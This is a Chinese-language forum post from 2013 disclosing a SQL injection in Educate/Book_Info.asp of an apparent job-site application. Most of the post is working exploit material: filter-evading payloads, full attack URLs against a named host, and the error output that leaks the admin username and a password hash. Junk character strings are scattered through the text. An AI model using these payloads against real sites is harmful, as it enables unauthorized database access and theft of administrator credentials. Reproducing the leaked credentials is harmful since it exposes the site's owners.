漏洞出现在Educate/Book_Info.asp. @6 U) o0 A# i: m& d
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
( `' a, q1 [: K$ g- dexp:如下4 Q) T3 u/ {! k j" J" V( R% Z8 j/ p
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
1 M: k# [1 Z9 K查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)9 n, `* ^0 w. }+ I4 p7 }( A
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
/ {. F7 ] @# L5 X* R7 q1 Z% JMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'" ], W& n0 `1 [
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
/ v+ T: I+ C% d, [9 w, _3 X/Educate/Book_Info.asp,行 8: v4 {0 p5 M0 N9 e
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)0 n, k3 T' d3 Q6 q' E
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'4 @# d# E: l: E% f) c: G/ W2 U
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。0 S1 a# [" V9 V4 o
/Educate/Book_Info.asp,行 8 |
发表于 2013-2-13 23:56:06
收藏
支持
反对